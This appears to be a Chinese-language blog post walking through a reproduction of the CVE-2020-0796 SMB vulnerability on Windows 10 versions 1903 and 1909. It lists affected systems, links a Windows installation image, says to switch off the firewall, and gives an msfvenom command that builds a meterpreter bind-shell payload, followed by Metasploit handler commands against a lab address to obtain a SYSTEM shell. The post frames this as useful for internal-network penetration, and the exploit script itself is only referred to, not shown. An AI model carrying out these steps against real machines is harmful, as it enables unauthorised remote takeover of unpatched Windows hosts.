CVE-2020-0796復現

簡單來說,適合內網滲透,除非有人把win10放在了公網上。
危害:拿到shell和系統權限。
利用難度:簡單。

1、受影響的系統版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

復現的話,推薦用這個鏡像。

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

進去之後把windows防護牆關掉。

2、復現

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

生成evil.py,把buf變量改成USER_PAYLOAD,同時,將每行前面加入b,代表byte,後面腳本沒有這個會報錯。
在這裏插入圖片描述
然後將啓動msf,進行監聽。

msf > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set rhost 172.16.230.165
rhost => 172.16.230.165
msf5 exploit(multi/handler) > exploit

在這裏插入圖片描述
運行腳本,使用python3。
在這裏插入圖片描述
執行完畢之後,靶機電腦會要求重啓。
然後我們這邊就會獲得一個帶有系統權限的shell。
在這裏插入圖片描述

3、總結

沒啥總結的,動起手來是王道。

腳本在這

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章